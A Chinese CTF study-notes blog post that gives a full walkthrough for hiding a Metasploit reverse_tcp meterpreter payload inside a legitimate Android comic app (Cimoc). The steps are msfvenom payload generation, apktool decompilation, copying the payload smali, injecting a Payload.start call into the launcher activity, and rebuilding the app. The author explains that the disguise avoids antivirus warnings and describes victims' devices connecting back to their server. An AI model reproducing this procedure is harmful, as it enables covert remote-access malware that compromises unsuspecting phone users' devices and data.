CTF学习笔记（大学篇）07 —— 手动注入msf到指定的程序

填坑回，因为之前在CTF学习笔记（大学篇）05 —— 通过msfconsole和520apkhook创建带有后门程序的安卓程序 | GamerNoTitle (bili33.top)这篇文章里面说有时间就写，然后写我们CTF俱乐部学期总结的时候就顺带讲了这个，所以就填了个坑

首先要生成带有后门程序的apk文件

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 R > pentestlab.apk

这里的host我实际上填的是我的公网服务器的IP地址，生成以后，如果直接安装，手机是肯定会报毒的（特别是装的国产定制ROM如MIUI、COLOROS之类的），这个时候就要把我们的后门程序注入到其他的软件里面去

（装上了会像右边这个图标这样，啥也没有，而且点开除了打开了后门也不会有什么反应）

然后我们反编译一下软件，用Linux（可能会）自带的apktool（如果没有请直走右转Github）

1
┌──(gamernotitle㉿kali-vmware)-[~/apk]
2
└─$ java -jar apktool_2.6.1.jar d -f -o payload pentestlab.apk
3
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
4
I: Using Apktool 2.6.1 on pentestlab.apk
5
I: Loading resource table...
6
I: Decoding AndroidManifest.xml with resources...
7
I: Loading resource table from file: /home/gamernotitle/.local/share/apktool/framework/1.apk
8
I: Regular manifest package...
9
I: Decoding file-resources...
10
I: Decoding values */* XMLs...
11
I: Baksmaling classes.dex...
12
I: Copying assets and libs...
13
I: Copying unknown files...
14
I: Copying original files...

这样后门程序就反编译完了，接下来要反编译我们需要的软件

1
┌──(gamernotitle㉿kali-vmware)-[~/apk]
2
└─$ java -jar apktool_2.6.1.jar d -f -o original Cimoc.apk
3
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
4
I: Using Apktool 2.6.1 on Cimoc.apk
5
I: Loading resource table...
6
I: Decoding AndroidManifest.xml with resources...
7
I: Loading resource table from file: /home/gamernotitle/.local/share/apktool/framework/1.apk
8
I: Regular manifest package...
9
I: Decoding file-resources...
10
I: Decoding values */* XMLs...
11
I: Baksmaling classes.dex...
12
I: Copying assets and libs...
13
I: Copying unknown files...
14
I: Copying original files...

接着把payload的文件弄到我们要注入的程序目录下

1
┌──(gamernotitle㉿kali-vmware)-[~/apk]
2
└─$ cp payload/smali/com/metasploit/stage original/smali/com/metasploit/stage -r

在软件反编译后的AndroidManifest.xml文件里面，会存放着软件的权限列表、活动列表等信息，在这里可以看到最开始启动了什么活动

1
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="29" android:compileSdkVersionCodename="10" package="com.hiroshi.cimoc" platformBuildVersionCode="29" platformBuildVersionName="10">
2
    <uses-permission android:name="android.permission.INTERNET"/>
3
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
4
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
5
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
6
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
7
    <uses-permission android:name="com.google.android.finsky.permission.BIND_GET_INSTALL_REFERRER_SERVICE"/>
8
    <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE"/>
9
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:largeHeap="true" android:name="com.hiroshi.cimoc.App" android:requestLegacyExternalStorage="true" android:supportsRtl="true" android:theme="@style/AppTheme" android:usesCleartextTraffic="true">
10
        <activity android:name="com.hiroshi.cimoc.ui.activity.MainActivity" android:screenOrientation="unspecified" android:windowSoftInputMode="adjustPan">
11
            <intent-filter>
12
                <action android:name="android.intent.action.MAIN"/>
13
                <category android:name="android.intent.category.LAUNCHER"/>
14
            </intent-filter>
15
        </activity>
16
        <activity android:name="com.hiroshi.cimoc.ui.activity.ResultActivity" android:screenOrientation="unspecified"/>
17
        <activity android:name="com.hiroshi.cimoc.ui.activity.DetailActivity" android:screenOrientation="unspecified"/>
18
        <activity android:name="com.hiroshi.cimoc.ui.activity.ChapterActivity" android:screenOrientation="unspecified"/>
19
        <activity android:name="com.hiroshi.cimoc.ui.activity.TagEditorActivity" android:screenOrientation="unspecified"/>
20
        <activity android:name="com.hiroshi.cimoc.ui.activity.TaskActivity" android:screenOrientation="unspecified"/>
21
        <activity android:name="com.hiroshi.cimoc.ui.activity.SettingsActivity" android:screenOrientation="unspecified"/>
22
        <activity android:name="com.hiroshi.cimoc.ui.activity.settings.ReaderConfigActivity" android:screenOrientation="unspecified"/>
23
        <activity android:name="com.hiroshi.cimoc.ui.activity.BackupActivity" android:screenOrientation="unspecified"/>
24
        <activity android:name="com.hiroshi.cimoc.ui.activity.AboutActivity" android:screenOrientation="unspecified"/>
25
        <activity android:name="com.hiroshi.cimoc.ui.activity.CategoryActivity" android:screenOrientation="unspecified"/>
26
        <activity android:name="com.hiroshi.cimoc.ui.activity.SearchActivity" android:screenOrientation="unspecified"/>
27
        <activity android:name="com.hiroshi.cimoc.ui.activity.SourceDetailActivity" android:screenOrientation="unspecified"/>
28
        <activity android:name="com.hiroshi.cimoc.ui.activity.PartFavoriteActivity" android:screenOrientation="unspecified"/>
29
        <activity android:name="com.hiroshi.cimoc.ui.activity.DirPickerActivity" android:screenOrientation="unspecified"/>
30
        <activity android:configChanges="orientation|screenSize" android:name="com.hiroshi.cimoc.ui.activity.settings.EventSettingsActivity"/>
31
        <activity android:configChanges="orientation|screenSize" android:name="com.hiroshi.cimoc.ui.activity.PageReaderActivity"/>
32
        <activity android:configChanges="orientation|screenSize" android:name="com.hiroshi.cimoc.ui.activity.StreamReaderActivity"/>
33
        <service android:name="com.hiroshi.cimoc.service.DownloadService"/>
34
        <activity android:name="com.hiroshi.cimoc.ui.activity.BrowserFilter" android:theme="@android:style/Theme.NoDisplay">
35
            <intent-filter>
36
                <action android:name="android.intent.action.SEND"/>
37
                <category android:name="android.intent.category.DEFAULT"/>
38
                <data android:mimeType="text/plain"/>
39
            </intent-filter>
40
            <intent-filter>
41
                <action android:name="android.intent.action.VIEW"/>
42
                <category android:name="android.intent.category.DEFAULT"/>
43
                <category android:name="android.intent.category.BROWSABLE"/>
44
                <data android:scheme="cimoc"/>
45
                <data android:host="m.buka.cn" android:scheme="http"/>
46
                <data android:host="m.buka.cn" android:scheme="https"/>
47
                <data android:host="www.dm5.com" android:scheme="http"/>
48
                <data android:host="www.dm5.com" android:scheme="https"/>
49
                <data android:host="tel.dm5.com" android:scheme="http"/>
50
                <data android:host="tel.dm5.com" android:scheme="https"/>
51
                <data android:host="manhua.dmzj.com" android:scheme="http"/>
52
                <data android:host="manhua.dmzj.com" android:scheme="https"/>
53
                <data android:host="m.dmzj.com" android:scheme="http"/>
54
                <data android:host="m.dmzj.com" android:scheme="https"/>
55
                <data android:host="m.5qmh.com" android:scheme="http"/>
56
                <data android:host="m.5qmh.com" android:scheme="https"/>
57
                <data android:host="m.pufei.net" android:scheme="http"/>
58
                <data android:host="m.pufei.net" android:scheme="https"/>
59
                <data android:host="ac.qq.com" android:scheme="http"/>
60
                <data android:host="ac.qq.com" android:scheme="https"/>
61
                <data android:host="m.ac.qq.com" android:scheme="http"/>
62
                <data android:host="m.ac.qq.com" android:scheme="https"/>
63
                <data android:host="www.u17.com" android:scheme="http"/>
64
                <data android:host="www.u17.com" android:scheme="https"/>
65
                <data android:host="www.migudm.cn" android:scheme="http"/>
66
                <data android:host="www.migudm.cn" android:scheme="https"/>
67
                <data android:host="m.migudm.cn" android:scheme="http"/>
68
                <data android:host="m.migudm.cn" android:scheme="https"/>
69
                <data android:host="99770.hhxxee.com" android:scheme="http"/>
70
                <data android:host="99770.hhxxee.com" android:scheme="https"/>
71
                <data android:host="www.cartoonmad.com" android:scheme="http"/>
72
                <data android:host="www.cartoonmad.com" android:scheme="https"/>
73
                <data android:host="www.2animx.com" android:scheme="http"/>
74
                <data android:host="www.2animx.com" android:scheme="https"/>
75
                <data android:host="www.50mh.com" android:scheme="http"/>
76
                <data android:host="www.50mh.com" android:scheme="https"/>
77
                <data android:host="m.50mh.com" android:scheme="http"/>
78
                <data android:host="m.50mh.com" android:scheme="https"/>
79
                <data android:host="www.manhuadb.com" android:scheme="http"/>
80
                <data android:host="www.manhuadb.com" android:scheme="https"/>
81
                <data android:host="m.bnmanhua.com" android:scheme="http"/>
82
                <data android:host="m.bnmanhua.com" android:scheme="https"/>
83
                <data android:host="m.tohomh123.com" android:scheme="http"/>
84
                <data android:host="m.tohomh123.com" android:scheme="https"/>
85
                <data android:host="www.chuixue.net" android:scheme="http"/>
86
                <data android:host="www.chuixue.net" android:scheme="https"/>
87
                <data android:host="m.517manhua.com" android:scheme="http"/>
88
                <data android:host="m.517manhua.com" android:scheme="https"/>
89
            </intent-filter>
90
        </activity>
91
        <provider android:authorities="com.hiroshi.cimoc" android:exported="false" android:grantUriPermissions="true" android:name="androidx.core.content.FileProvider">
92
            <meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/file_paths_public"/>
93
        </provider>
94
        <service android:directBootAware="true" android:exported="false" android:name="com.google.firebase.components.ComponentDiscoveryService">
95
            <meta-data android:name="com.google.firebase.components:com.google.firebase.crashlytics.CrashlyticsRegistrar" android:value="com.google.firebase.components.ComponentRegistrar"/>
96
            <meta-data android:name="com.google.firebase.components:com.google.firebase.remoteconfig.RemoteConfigRegistrar" android:value="com.google.firebase.components.ComponentRegistrar"/>
97
            <meta-data android:name="com.google.firebase.components:com.google.firebase.analytics.connector.internal.AnalyticsConnectorRegistrar" android:value="com.google.firebase.components.ComponentRegistrar"/>
98
            <meta-data android:name="com.google.firebase.components:com.google.firebase.abt.component.AbtRegistrar" android:value="com.google.firebase.components.ComponentRegistrar"/>
99
            <meta-data android:name="com.google.firebase.components:com.google.firebase.iid.Registrar" android:value="com.google.firebase.components.ComponentRegistrar"/>
100
        </service>
101
        <receiver android:enabled="true" android:exported="false" android:name="com.google.android.gms.measurement.AppMeasurementReceiver"/>
102
        <receiver android:enabled="true" android:exported="true" android:name="com.google.android.gms.measurement.AppMeasurementInstallReferrerReceiver" android:permission="android.permission.INSTALL_PACKAGES">
103
            <intent-filter>
104
                <action android:name="com.android.vending.INSTALL_REFERRER"/>
105
            </intent-filter>
106
        </receiver>
107
        <service android:enabled="true" android:exported="false" android:name="com.google.android.gms.measurement.AppMeasurementService"/>
108
        <service android:enabled="true" android:exported="false" android:name="com.google.android.gms.measurement.AppMeasurementJobService" android:permission="android.permission.BIND_JOB_SERVICE"/>
109
        <receiver android:exported="true" android:name="com.google.firebase.iid.FirebaseInstanceIdReceiver" android:permission="com.google.android.c2dm.permission.SEND">
110
            <intent-filter>
111
                <action android:name="com.google.android.c2dm.intent.RECEIVE"/>
112
            </intent-filter>
113
        </receiver>
114
        <provider android:authorities="com.hiroshi.cimoc.firebaseinitprovider" android:exported="false" android:initOrder="100" android:name="com.google.firebase.provider.FirebaseInitProvider"/>
115
        <activity android:exported="false" android:name="com.google.android.gms.common.api.GoogleApiActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar"/>
116
        <meta-data android:name="com.google.android.gms.version" android:value="@integer/google_play_services_version"/>
117
        <service android:exported="false" android:name="com.google.android.datatransport.runtime.backends.TransportBackendDiscovery">
118
            <meta-data android:name="backend:com.google.android.datatransport.cct.CctBackendFactory" android:value="cct"/>
119
        </service>
120
        <service android:exported="false" android:name="com.google.android.datatransport.runtime.scheduling.jobscheduling.JobInfoSchedulerService" android:permission="android.permission.BIND_JOB_SERVICE"/>
121
        <receiver android:exported="false" android:name="com.google.android.datatransport.runtime.scheduling.jobscheduling.AlarmManagerSchedulerBroadcastReceiver"/>
122
    </application>
123
</manifest>

其中，下面这行就告诉我们启动了一个名为com.hiroshi.cimoc.ui.activity.MainActivity的活动

1
<activity android:name="com.hiroshi.cimoc.ui.activity.MainActivity" android:screenOrientation="unspecified" android:windowSoftInputMode="adjustPan">

然后我们找到这个活动的代码，把我们的函数修改一下，让它调用我们的后门（这里没有加固，也会被检测出来）

【这个寻找的过程其实很麻烦，特别是像tx和网E这种的，超级难找】

1
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

找到我们的AndroidManifest.xml，在权限列表里面加入我们需要的权限，然后编译

1
    <uses-permission android:name="android.permission.INTERNET"/>
2
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
3
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
4
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
5
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
6
    <uses-permission android:name="com.google.android.finsky.permission.BIND_GET_INSTALL_REFERRER_SERVICE"/>
7
    <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE"/>

（应用原来就有的权限，可以自己添加，格式可以参考Google的开发文档）

同样使用apktool进行编译

1
┌──(gamernotitle㉿kali-vmware)-[~/apk]
2
└─$ java -jar apktool_2.6.1.jar b ~/apk/original/
3
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
4
I: Using Apktool 2.6.1
5
I: Checking whether sources has changed...
6
I: Smaling smali folder into classes.dex...
7
I: Checking whether resources has changed...
8
I: Building resources...
9
I: Copying libs... (/lib)
10
I: Copying libs... (/kotlin)
11
I: Building apk file...
12
I: Copying unknown files/dir...
13
I: Built apk...

这样就编译完了，把软件放到手机上进行安装，打开后在服务器就可以看到肉鸡上线了